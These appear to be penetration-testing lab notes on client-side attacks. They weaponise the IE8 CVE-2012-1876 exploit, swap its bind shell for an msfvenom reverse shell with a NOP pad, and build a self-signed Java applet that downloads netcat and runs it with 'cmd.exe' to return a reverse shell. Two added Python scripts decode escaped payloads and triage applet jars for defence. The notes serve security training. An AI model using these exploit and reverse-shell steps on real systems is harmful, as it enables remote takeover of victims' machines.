CLIENT SIDE ATTACKS
CLIENT SIDE ATTACKS - Overview
The MS12-037 security bulletin from Microsoft covered a number of serious Internet Explorer vulnerabilities. One of them is a heap overflow caused by the span attribute. A public exploit was released for this vulnerability (CVE-2012-1876) at www.exploit-db.com/exploits/24017/ (Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass). Several versions have been archived in the exploit database. The videos use the one created by "sickness".
Let's try using this against our Windows 7 lab machine to simulate a client-side attack.
Examining the code, we see that the exploit uses a bind shell on port 4444. Ideally we would use a reverse shell instead. We can keep everything else as is and just replace the shellcode with a reverse shell of exactly the same size; if done carefully, this should still work. For the moment, though, let's get it to work as is.
Let's start by downloading the code, placing it in the webroot directory on the attacking Kali machine, and starting the Apache service so that the file can be browsed to.
root@kali:~# cd /var/www/html/
root@kali:/var/www/html# wget -O exploit.html http://www.exploit-db.com/download/24017
root@kali:/var/www/html# service apache2 start
Connect to the Windows 7 lab machine and run netstat to check whether anything is already listening on port 4444, where the bind shell will start listening.
C:\>netstat -an|find "4444"
With nothing listening on port 4444, we browse to the exploit:
The first time the page loads it may produce an error; if so, refresh or reload the page. Then run the netstat command again and check for anything listening on port 4444. If a listener is now present on port 4444, the exploit has most likely succeeded and we can connect to the lab machine from the attacking Kali machine using netcat.
Since the code uses a bind shell, the Windows firewall must be turned off for the connection to succeed.
Now we can connect and get a bind shell (with the firewall off):
root@kali:~# nc -v 10.11.25.139 4444
CLIENT SIDE ATTACKS - Replacing Shellcode (swap the 342-byte bind shell for 324 bytes of reverse TCP shellcode + 18 NOPs)
Connecting to the bind shell fails while the Windows firewall is switched on. To get past the firewall, we swap the bind shell for a reverse shell of the same size that connects back out over port 443.
Looking at the shellcode format in the exploit:
# nano /var/www/html/exploit.html
We use msfvenom to generate the shellcode in the same Unicode-escaped (js_le) format.
# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.179 LPORT=443 -f js_le --platform windows -a x86 -e generic/none
The generated shellcode is 324 bytes long. A quick calculation shows that this is 18 bytes smaller than the bind shell it will replace.
# echo 342-324|bc
Since the new shellcode is smaller than the existing one, we can replace the old shellcode in exploit.html with ours, padding out with 18 NOPs. In the Unicode-escaped format, a NOP is written as %u9090.
We now set up the netcat listener on the attacker before opening exploit.html on the victim.
# nc -lvp 443
Now when the victim browses to 10.11.0.179/exploit.html, the reverse shell connection is established on the attacking Kali machine.
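As an added analysis example (not part of the original notes), the script below decodes the %uXXXX-escaped payload format this section works with, the way an analyst would when pulling a suspected exploit page out of a proxy capture: each %uXXXX unit is a 16-bit little-endian code unit, so it contributes two bytes, and a run of %u9090 units is an x86 NOP sled. The HTML it inspects is a constructed sample with two placeholder units followed by nine %u9090 units (the 18-byte pad computed above); the regular expressions, function names and thresholds are my own, not from the exploit or the course material.

```python
"""Decode and triage JavaScript %uXXXX-escaped payloads found in HTML."""
import re

# One %uXXXX unit is a 16-bit code unit stored little-endian, i.e. two bytes.
UNIT_RE = re.compile(r"%u([0-9a-fA-F]{4})")
# Exploit pages of this kind keep the payload inside a JavaScript unescape("...") call.
UNESCAPE_RE = re.compile(r"""unescape\(\s*["']((?:%u[0-9a-fA-F]{4})+)["']\s*\)""")

# Constructed sample (not a real exploit): two placeholder units followed by
# nine %u9090 units, i.e. the 18-byte NOP pad computed in the notes (342 - 324).
SAMPLE_HTML = (
    "<html><script>\n"
    "var shellcode = unescape(\"%u4141%u4242" + "%u9090" * 9 + "\");\n"
    "</script></html>\n"
)


def decode_unicode_escape(s):
    """Turn a %uXXXX string into the bytes the browser would place in memory.

    %u9090 -> 90 90, and %u4142 -> 42 41 because the unit is little-endian.
    """
    out = bytearray()
    for m in UNIT_RE.finditer(s):
        out += int(m.group(1), 16).to_bytes(2, "little")
    return bytes(out)


def longest_nop_run(payload):
    """Length in bytes of the longest consecutive run of 0x90 (x86 NOP)."""
    best = cur = 0
    for b in payload:
        cur = cur + 1 if b == 0x90 else 0
        best = max(best, cur)
    return best


def triage_html(html, min_len=200, min_nop_run=8):
    """Report size and NOP content of every unescape() payload in the page.

    Thresholds are illustrative: a decoded payload of a few hundred bytes or a
    NOP run of several bytes is what a content filter would flag for review.
    """
    findings = []
    for m in UNESCAPE_RE.finditer(html):
        payload = decode_unicode_escape(m.group(1))
        nops = longest_nop_run(payload)
        findings.append({
            "units": len(UNIT_RE.findall(m.group(1))),
            "bytes": len(payload),
            "nop_run": nops,
            "suspicious": len(payload) >= min_len or nops >= min_nop_run,
        })
    return findings


if __name__ == "__main__":
    for finding in triage_html(SAMPLE_HTML):
        print(finding)
```

Running it on the constructed sample reports 11 units decoding to 22 bytes with an 18-byte NOP run, which the thresholds mark as suspicious; on a captured page the same decoder gives the exact byte count, which is what the size arithmetic in this section depends on.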
CLIENT SIDE ATTACKS - Malicious Java Applets
This attack targets victims who have Java installed and enabled in their browsers.
Using the code from the manual, I have copied it into Java.java on the attacking Kali machine. This code downloads and executes a given file.
We will modify this code to download netcat from our own attacking web server and then use netcat to send us back a reverse shell from the victim machine.
A line in the code that reads:
f = Runtime.getRuntime().exec("cmd.exe /c " + expath);
will need to be modified to read (note the leading space before the netcat arguments, so they are separated from the executable path):
f = Runtime.getRuntime().exec("cmd.exe /c " + expath + " 10.11.0.179 443 -e cmd.exe");
We then compile the code.
# javac Java.java
# echo "Permissions: all-permissions" > /root/manifest.txt
# jar cvf Java.jar Java.class
Once compiled, I go ahead and sign the Java applet.
# keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass password123
# jarsigner -keystore mykeystore -storepass password123 -keypass mykeypass -signedjar SignedJava.jar Java.jar signapplet
Now we embed the applet in an HTML page.
# echo '' > /var/www/html/java.html
The applet will look for evil.exe in our webroot. Below I copy the Windows netcat executable into the webroot and rename it evil.exe.
# cp /usr/share/windows-binaries/nc.exe /var/www/html/evil.exe
Now we set up a listener on the attacking Kali machine on port 443.
# nc -lvp 443
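On the receiving side, the manifest attribute and the signature files produced by the jar and jarsigner steps above are exactly what an analyst checks when triaging a suspicious applet. The following Python script is an added example, not from the course material: it builds a constructed jar in memory (placeholder class bytes and a placeholder signature block, not a real signature) and reports whether the manifest requests all-permissions and whether the jar carries signature entries. Verifying who signed it (a self-signed key as in the keytool step above versus a trusted CA) requires parsing the certificate in the signature block and is outside this script.

```python
"""Triage a Java applet jar: does its manifest request full permissions,
and does it carry signature entries?"""
import io
import zipfile

MANIFEST_PATH = "META-INF/MANIFEST.MF"
# Entry suffixes that jarsigner writes into META-INF/ when it signs a jar.
SIGNATURE_SUFFIXES = (".SF", ".RSA", ".DSA", ".EC")


def build_sample_jar():
    """Constructed stand-in for a jar produced by 'jar' followed by 'jarsigner'.

    The class bytes, digest and signature block are placeholders so the script
    runs offline; only the manifest attributes and entry names are realistic.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(MANIFEST_PATH,
                   "Manifest-Version: 1.0\r\n"
                   "Permissions: all-permissions\r\n"
                   "Created-By: constructed sample\r\n"
                   "\r\n"
                   "Name: Java.class\r\n"
                   "SHA-256-Digest: cGxhY2Vob2xkZXI=\r\n")   # placeholder digest
        z.writestr("META-INF/SIGNAPPLET.SF", "Signature-Version: 1.0\r\n")
        z.writestr("META-INF/SIGNAPPLET.DSA", b"\x30\x00")  # placeholder, not a PKCS#7 block
        z.writestr("Java.class", b"\xca\xfe\xba\xbe")       # placeholder class bytes
    return buf.getvalue()


def parse_main_attributes(manifest_text):
    """Return the manifest's main section (up to the first blank line) as a dict.

    Per-entry sections follow the blank line and are ignored here; a line that
    starts with a single space continues the previous attribute's value.
    """
    attrs = {}
    last_key = None
    for raw in manifest_text.splitlines():
        if raw.strip() == "":
            break
        if raw.startswith(" ") and last_key is not None:
            attrs[last_key] += raw[1:]
            continue
        key, _, value = raw.partition(":")
        last_key = key.strip()
        attrs[last_key] = value.strip()
    return attrs


def inspect_jar(jar_bytes):
    """Summarise the facts a reviewer wants before trusting an applet jar."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as z:
        names = z.namelist()
        main = {}
        if MANIFEST_PATH in names:
            main = parse_main_attributes(z.read(MANIFEST_PATH).decode("utf-8"))
    sig_files = [n for n in names
                 if n.startswith("META-INF/") and n.upper().endswith(SIGNATURE_SUFFIXES)]
    perms = main.get("Permissions")
    return {
        "permissions": perms,
        "signed": bool(sig_files),
        "signature_files": sig_files,
        "classes": [n for n in names if n.endswith(".class")],
        # An applet asking for all-permissions runs outside the sandbox once the
        # user accepts the warning dialog, so it deserves the closest look.
        "requests_full_trust": perms == "all-permissions",
    }


if __name__ == "__main__":
    for key, value in inspect_jar(build_sample_jar()).items():
        print(f"{key}: {value}")
```

On the constructed jar the summary shows permissions all-permissions, signed True and the two SIGNAPPLET entries; the same function can be pointed at a jar recovered from a web proxy or a browser cache by passing its bytes.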